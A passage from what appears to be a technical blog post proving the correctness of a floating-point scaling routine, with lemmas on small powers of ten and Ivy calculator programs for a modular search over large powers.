[Large Powers, Printing] <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><MO form='prefix'>−</MO><mn>28</mn><mo stretchy=false>]</mo><mo>∪</mo><mo stretchy=false>[</mo><mn>28</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math>, <math><mrow><mi>b</mi><mo>≤</mo><mn>55</mn></mrow></math>, <math><mrow><mi>m</mi><mo>≥</mo><mn>66</mn></mrow></math>.
<li>
[Large Powers, Parsing] <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><MO form='prefix'>−</MO><mn>28</mn><mo stretchy=false>]</mo><mo>∪</mo><mo stretchy=false>[</mo><mn>28</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math>, <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>, <math><mrow><mi>m</mi><mo>≥</mo><mn>73</mn></mrow></math>.</ul>
<a class=anchor href="#small_positive_powers"><h2 id="small_positive_powers">Small Positive Powers</h2></a>
<div class=lemma id=lemma7>
<p>
<b>Lemma 7</b>. For inexact results and <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>27</mn><mo stretchy=false>]</mo></mrow></math> and <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<p>
<i>Proof</i>. <math><mrow><mn>5</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo><</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>63</mn></msup></mrow></math>, so the non-zero bits of <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> fits in the high 63 bits.
That implies that the <math><mrow><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mn>128</mn></mrow></math>-bit product <math><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> ends in 65 zero bits.
Since <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>, that means <math><mrow><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mn>0</mn></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math>’s low bit is zero.
<p>
Because the result is inexact, <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn></mrow></math>, which implies <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn></mrow></math>
(since <math><mrow><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mn>0</mn></mrow></math>).
Since <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math>’s low bit is zero, <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>−</mo><mn>2</mn><mo stretchy=false>]</mo></mrow></math>.
By <a href="#lemma5">Lemma 5</a>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>.
By <a href="#lemma6">Lemma 6</a>, <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>. <math><mo>∎</mo></math>
</div>
<a class=anchor href="#small_negative_powers"><h2 id="small_negative_powers">Small Negative Powers</h2></a>
<div class=lemma id=lemma8>
<p>
<b>Lemma 8</b>. For inexact results and <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>27</mn><mo>,</mo><MO form='prefix'>−</MO><mn>1</mn><mo stretchy=false>]</mo></mrow></math> and <math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<p>
<i>Proof</i>. Scaling by <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math> cannot introduce inexactness, since it just adds or subtracts from
the exponent. The only inexactness must come from <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>, specifically the <math><mrow><mn>5</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> part.
Since <math><mrow><mi>p</mi><mo><</mo><mn>0</mn></mrow></math> and <math><mn>1/5</mn></math> is not exactly representable in a binary fraction,
the result is inexact if and only if <math><mrow><mi>x</mi><MO>mod</MO><mn>5</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>p</mi></mrow></msup><mo>≠</mo><mn>0</mn></mrow></math> (remember that <math><mrow><mo>−</mo><mi>p</mi></mrow></math> is positive!).
<p>
Since <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>127</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>128</mn></msup><mo stretchy=false>)</mo></mrow></math> and <math><mrow><mn>5</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>p</mi></mrow></msup><mo><</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mn>2</mn></mrow></msup></mrow></math>, <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mn>5</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>p</mi></mrow></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>k</mi></msup></mrow></math> for some <math><mrow><mi>k</mi><mo>≥</mo><mn>130</mn></mrow></math>.
Since <math><mrow><mi>m</mi><mo>+</mo><mi>b</mi><mo>≤</mo><mn>128</mn></mrow></math>, <math><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>k</mi><mo>−</mo><mo stretchy=false>(</mo><mi>m</mi><mo>+</mo><mi>b</mi><mo stretchy=false>)</mo></mrow></msup><mn>/5</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>p</mi></mrow></msup><mo stretchy=false>⌋</mo></mrow></mrow></math>
and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>m</mi><mo>+</mo><mi>b</mi></mrow></msup><mo>·</mo><mo stretchy=false>(</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>k</mi><mo>−</mo><mo stretchy=false>(</mo><mi>m</mi><mo>+</mo><mi>b</mi><mo stretchy=false>)</mo></mrow></msup><MO>mod</MO><mn>5</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>p</mi></mrow></msup><mo stretchy=false>)</mo><mn>/5</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>p</mi></mrow></msup></mrow></math>.
That is, <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> encodes some non-zero binary fraction with
denominator <math><mrow><mn>5</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>p</mi></mrow></msup></mrow></math>.
Note also that <math><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI></mrow></math> is <math><mrow><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mn>128</mn></mrow></math> bits and the output is at most 64 bits we have <math><mrow><mi>m</mi><mo>≥</mo><mn>64</mn></mrow></math>,
so <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>63</mn></mrow></msup><mo>≥</mo><mn>2</mn></mrow></math>.
<p>
That implies<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>m</mi><mo>+</mo><mi>b</mi></mrow></msup><mo>·</mo><mo stretchy=false>(</mo><mn>5</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>27</mn></mrow></msup><mo>,</mo><mn>1</mn><mo>−</mo><mn>5</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>27</mn></mrow></msup><mo stretchy=false>)</mo></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>⊂</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>m</mi><mo>+</mo><mi>b</mi></mrow></msup><mo>·</mo><mo stretchy=false>(</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>63</mn></mrow></msup><mo>,</mo><mn>1</mn><mo>−</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>63</mn></mrow></msup><mo stretchy=false>)</mo></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>·</mo><mo stretchy=false>(</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>63</mn></mrow></msup><mo>,</mo><mn>1</mn><mo>−</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>63</mn></mrow></msup><mo stretchy=false>)</mo></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>⊂</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mn>2</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>m</mi><mo>−</mo><mn>2</mn></mrow></msup><mo stretchy=false>)</mo></mrow></mtd></mtr></mtable></math></div>
<p>
By <a href="#lemma5">Lemma 5</a> and <a href="#lemma6">Lemma 6</a>, <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>. <math><mo>∎</mo></math>
</div>
<a class=anchor href="#large_powers"><h2 id="large_powers">Large Powers</h2></a>
<p>
That leaves <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>400</mn><mo>,</mo><MO form='prefix'>−</MO><mn>28</mn><mo stretchy=false>]</mo><mo>∪</mo><mo stretchy=false>[</mo><mn>28</mn><mo>,</mo><mn>400</mn><mo stretchy=false>]</mo></mrow></math>.
There are not many <math><MI>𝑝𝑚</MI></math> to check—under a thousand—but there are far too many <math><mi>x</mi></math> to
exhaustively test that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn></mrow></math> for all of them.
Instead, we will have to be a bit more clever.
<p>
It would be simplest if we could prove that all possible <math><MI>𝑝𝑚</MI></math> and all <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup><mo stretchy=false>)</mo></mrow></math>
result in a non-zero middle,
but that turns out not to be the case.
<p>
For example, using <math><mrow><mi>p</mi><mo>=</mo><MO form='prefix'>−</MO><mn>29</mn></mrow></math>, <math><mrow><mi>x</mi><mo>=</mo><mtext>0x8e151cee6e31e067</mtext></mrow></math> is a problem,
which we can verify using <a href="https://github.com/robpike/ivy">the Ivy calculator</a>:
<pre class='language-ivy'># hex x is the hex formatting of x (as text)
op hex x = '#x' text x
# spaced adds spaces to s between sections of 16 characters
op spaced s = (count s) <= 18: s; (spaced -16 drop s), ' ', -16 take s
# pe returns the binary exponent for 10**p.
op pe p = -(127+ceil 2 log 10**-p)
# pm returns the 128-bit mantissa for 10**p.
op pm p = ceil (10**p) / 2**pe p
spaced hex (pm -29) * 0x8e151cee6e31e067
-- out --
0x7091bfc45568750f 0000000000000000 d81262b60aa6e8b7
</pre>
<p>
We might perhaps think the problem is that <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mn>29</mn></mrow></msup></mrow></math> is too close to the small negative powers,
but positive powers break too:
<pre class='language-ivy'>spaced hex (pm 31) * 0x93997b98618e62a1
-- out --
0x918b5cd9fd69fdc5 0000000000000000 6d00000000000000
</pre>
<p>
We might yet hope that the zeros were not caused by an error carry;
then as long as we force the inexact bit to 1, we could still use the high bits.
And indeed, for both of the previous examples, the zeros are not caused
by an error carry: <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> is all zeros.
But that is not always the case. Here is a middle that is zero due to an error carry
that overflowed into the top bits:
<pre class='language-ivy'>spaced hex (pm 62) * 0xd5bc71e52b31e483
spaced hex ((10**62) * 0xd5bc71e52b31e483) >> (pe 62)
-- out --
0xcfd352e73dc6ddc3 0000000000000000 774bd77b38816199
0xcfd352e73dc6ddc2 ffffffffffffffff e6fdb9b19804952a
</pre>
<p>
Instead of proving the completely general case,
we will have to pick our battles
and focus on the specific cases we need for floating-point conversions.
<p>
We don’t need to try every possible input width below the maximum <math><mi>b</mi></math>.
Looking at <math><mtext>Scale</mtext></math>, it is clear that
the inputs <math><mi>x</mi></math> and <math><mrow><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>k</mi></msup></mrow></math> have the same <math><MI>𝑡𝑜𝑝</MI></math> and <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math>,
and also that <math><mrow><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><mo stretchy=false>(</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>k</mi></msup><mo stretchy=false>)</mo><mo>=</mo><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>k</mi></msup></mrow></math>.
Since the middles are the same, the condition <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn></mrow></math> has
the same truth value for both inputs.
So we can limit our analysis to maximum-width <math><mi>b</mi></math>-bit inputs in <math><mrow><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><mo>−</mo><mn>1</mn></mrow></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>)</mo></mrow></math>.
Similarly, we can prove that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn></mrow></math> for <math><mrow><mi>m</mi><mo>≥</mo><mi>k</mi></mrow></math> by proving it for <math><mrow><mi>m</mi><mo>=</mo><mi>k</mi></mrow></math>:
moving more bits from the low end of <math><MI>𝑡𝑜𝑝</MI></math> to the high end of <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math>
cannot make <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math> a smaller number.
<p>
Proving that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn></mrow></math> for the cases we listed above means proving:
<ul>
<li>
[Printing] (<math><mrow><mi>b</mi><mo>≤</mo><mn>55</mn></mrow></math>, <math><mrow><mi>m</mi><mo>≥</mo><mn>66</mn></mrow></math>.) <br>
For all large <math><mi>p</mi></math> and all <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>54</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>55</mn></msup><mo stretchy=false>)</mo></mrow></math>: <math><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><mn>55</mn><mo>+</mo><mn>66</mn><mo>=</mo><mn>121</mn></mrow></msup><mo>≥</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mn>55</mn><mo>+</mo><mn>1</mn><mo>=</mo><mn>56</mn></mrow></msup></mrow></math>.
<li>
[Parsing] (<math><mrow><mi>b</mi><mo>≤</mo><mn>64</mn></mrow></math>, <math><mrow><mi>m</mi><mo>≥</mo><mn>73</mn></mrow></math>.) <br>
For all large <math><mi>p</mi></math> and all <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>63</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup><mo stretchy=false>)</mo></mrow></math>: <math><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><mn>64</mn><mo>+</mo><mn>73</mn><mo>=</mo><mn>137</mn></mrow></msup><mo>≥</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mn>64</mn><mo>+</mo><mn>1</mn><mo>=</mo><mn>65</mn></mrow></msup></mrow></math>.</ul>
<p>
To prove these two conditions, we are going to write an Ivy program to analyze each <math><MI>𝑝𝑚</MI></math> separately,
proving that all relevant <math><mi>x</mi></math> satisfy the condition.
<p>
Ivy has arbitrary-precision rationals and lightweight syntax,
making it a convenient tool for sketching and testing mathematical algorithms,
in the spirit of Iverson’s Turing Award lecture about APL,
“<a href="https://dl.acm.org/doi/pdf/10.1145/1283920.1283935">Notation as a Tool of Thought</a>.”
Like APL, Ivy uses strict right-to-left operator precedence:
<code>1+2*3+4</code> means <code>(1+(2*(3+4)))</code>,
and <code>floor 10 log f</code> means <code>floor (10 log f)</code>.
Operators can be prefix unary like <code>floor</code> or infix binary like <code>log</code>.
Each of the Ivy displays in this post is executable:
you can edit the code and re-run them by clicking the Play button (“▶️”).
A full introduction to Ivy is beyond the scope of this post;
see <a href="https://swtch.com/ivy/demo.html">the Ivy demo</a> for more examples.
<p>
We’ve already started the proof program above by defining <code>pm</code> and <code>pe</code>.
Let’s continue by defining a few more helpers.
<p>
First let’s define <code>is</code>, an assertion for basic testing of other functions:
<pre class='language-ivy'># is asserts that x === y.
op x is y =
x === y: x=x
print x '≠' y
1 / 0
(1+2) is 3
</pre>
<pre class='language-ivy'>(2+2) is 5
-- out --
4 ≠ 5
-- err --
input:1: division by zero
</pre>
<p>
If the operands passed to <code>is</code> are not equal (the triple <code>===</code> does full vaue comparison),
then <code>is</code> prints them out and divides by zero to halt execution.
<p>
Next, we will set Ivy’s origin to 0 (instead of the default 1),
meaning <code>iota</code> starts counting at 0 and array indexes start at 0,
and then we will define <code>seq x y</code>, which returns the list of integers <math><mrow><mo stretchy=false>[</mo><mi>x</mi><mo>,</mo><mi>y</mi><mo stretchy=false>]</mo></mrow></math>.
<pre class='language-ivy'>)origin 0
# seq x y = (x x+1 x+2 ... y)
op seq (x y) = x + iota 1+y-x
(seq -2 4) is -2 -1 0 1 2 3 4
</pre>
<p>
Now we are ready to start attacking our problem, which is to prove that for a given <math><MI>𝑝𝑚</MI></math>, <math><mi>b</mi></math>, and <math><mi>m</mi></math>,
for all <math><mi>x</mi></math>, <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><mo>=</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mi>m</mi></mrow></msup><mo>≥</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup></mrow></math>,
implying <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn></mrow></math>,
at which point we can use Lemma 4.
<p>
We will proceed in two steps, loosely following an approach by
Vern Paxson and Tim Peters (the “<a href="#related">Related Work</a>” section explains the differences).
The first step is to solve the “modular search” problem of finding the minimum <math><mrow><mi>x</mi><mo>≥</mo><mn>0</mn></mrow></math> (the “first” <math><mi>x</mi></math>)
such that <math><mrow><mi>x</mi><mo>·</mo><mi>c</mi><MO>mod</MO><mi>m</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑙𝑜</MI><mo>,</mo><mtext><i>hi</i></mtext><mo stretchy=false>]</mo></mrow></math>.
The second step is to use that solution to solve the “modular minimum” problem of
finding an <math><mi>x</mi></math> in a given range that minimizes <math><mrow><mi>x</mi><mo>·</mo><mi>c</mi><MO>mod</MO><mi>m</mi></mrow></math>.
<a class=anchor href="#modfirst"><h2 id="modfirst">Modular Search</h2></a>
<p>
Given constants <math><mi>c</mi></math>, <math><mi>m</mi></math>, <math><MI>𝑙𝑜</MI></math>, and <math><mtext><i>hi</i></mtext></math>, we want to find the minimum <math><mrow><mi>x</mi><mo>≥</mo><mn>0</mn></mrow></math> (the “first” <math><mi>x</mi></math>) such that <math><mrow><mi>x</mi><mo>·</mo><mi>c</mi><MO>mod</MO><mi>m</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑙𝑜</MI><mo>,</mo><mtext><i>hi</i></mtext><mo stretchy=false>]</mo></mrow></math>.
This is an old programming contest problem, and I am not sure whether it has a formal name.
There are multiple ways to derive a GCD-like efficient solution.
The following explanation, based on <a href="https://codeforces.com/blog/entry/90690?#comment-791032">one by David Wärn</a>,
is the simplest I am aware of.
<p>
Here is a correct <math><mrow><mi>O</mi><mo stretchy=false>(</mo><mi>m</mi><mo stretchy=false>)</mo></mrow></math> iterative algorithm:
<pre>op modfirst (c m lo hi) =
xr x cx mx = 0 0 1 0
:while 1
# (A) xr ≤ hi but perhaps xr < lo.
:while xr < lo
xr x = xr x + c cx
:end
xr <= hi: x
# (B) xr - c < lo ≤ hi < xr
:while xr > hi
xr x = xr x + (-m) mx
:end
lo <= xr: x
# (C) xr < lo ≤ hi < xr + m
x >= m: -1
:end
</pre>
<p>
The algorithm walks <math><mi>x</mi></math> forward from 1, maintaining <math><mrow><MI>𝑥𝑟</MI><mo>=</mo><mi>x</mi><mo>·</mo><mi>c</mi><MO>mod</MO><mi>m</mi></mrow></math>:
<ul>
<li>
When <math><MI>𝑥𝑟</MI></math> is too small, it adds <math><mi>c</mi></math> to <math><MI>𝑥𝑟</MI></math> and increments <math><mi>x</mi></math> (<math><mrow><mi>c</mi><mi>x</mi><mo>=</mo><mn>1</mn></mrow></math>).
<li>
When <math><MI>𝑥𝑟</MI></math> is too large, it subtracts <math><mi>m</mi></math> from <math><MI>𝑥𝑟</MI></math> and leaves <math><mi>x</mi></math> unchanged (<math><mrow><mi>m</mi><mi>x</mi><mo>=</mo><mn>0</mn></mrow></math>).
<li>
When <math><mi>x</mi></math> reaches <math><mi>m</mi></math>, it gives up: there is no answer.</ul>
<p>
This loop is easily verified to be correct:
<ul>
<li>
It starts with <math><mrow><mi>x</mi><mo>=</mo><mn>0</mn></mrow></math> and considers successive <math><mi>x</mi></math> one at a time.
<li>
While doing that, it maintains <math><MI>𝑥𝑟</MI></math> correctly:
<ul>
<li>
If <math><MI>𝑥𝑟</MI></math> is too small, we <i>must</i> add a <math><mi>c</mi></math> (and increment <math><mi>x</mi></math>).
<li>
If <math><MI>𝑥𝑟</MI></math> is too large, we <i>must</i> subtract an <math><mi>m</mi></math> (and leave <math><mi>x</mi></math> alone).</ul>
<li>
If <math><mrow><MI>𝑥𝑟</MI><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑙𝑜</MI><mo>,</mo><mtext><i>hi</i></mtext><mo stretchy=false>]</mo></mrow></math>, it notices and stops.</ul>
<p>
The only problem with this <code>modfirst</code> is that it is unbearably slow,
but we can speed it up.
<p>
At (A), <math><mrow><mi>x</mi><mi>r</mi><mo>≤</mo><mi>h</mi><mi>i</mi></mrow></math>,
established by the initial <math><mrow><mi>x</mi><mi>r</mi><mo>=</mo><mn>0</mn></mrow></math> or by the end of the previous iteration.
<p>
At (B), <math><mrow><MI>𝑥𝑟</MI><mo>−</mo><mi>c</mi><mo><</mo><MI>𝑙𝑜</MI><mo>≤</mo><mtext><i>hi</i></mtext><mo><</mo><MI>𝑥𝑟</MI></mrow></math>.
Because <math><mrow><MI>𝑥𝑟</MI><mo>−</mo><mi>c</mi><mo><</mo><MI>𝑙𝑜</MI></mrow></math>, subtracting <math><mrow><mi>m</mi><mo>≥</mo><mi>c</mi></mrow></math> will
make <math><MI>𝑥𝑟</MI></math> too small; that will always be followed by at least
<math><mrow><mo stretchy=false>⌊</mo><mi>m</mi><mn>/</mn><mi>c</mi><mo stretchy=false>⌋</mo></mrow></math> additions of <math><mi>c</mi></math>.
So we might as well replace <math><mi>m</mi></math> with <math><mrow><MO form='prefix'>−</MO><mi>m</mi><mo>+</mo><mi>c</mi><mo>·</mo><mrow><mo stretchy=false>⌊</mo><mi>m</mi><mn>/</mn><mi>c</mi><mo stretchy=false>⌋</mo></mrow></mrow></math>,
speeding future trials.
We will also have to update <math><MI>𝑚𝑥</MI></math>, to make sure <math><mi>x</mi></math> is maintained correctly.
<p>
At (C),
<math><mrow><MI>𝑥𝑟</MI><mo>≤</mo><mtext><i>hi</i></mtext><mo><</mo><MI>𝑥𝑟</MI><mo>+</mo><mi>m</mi></mrow></math>,
and by a similar argument, we might as well replace
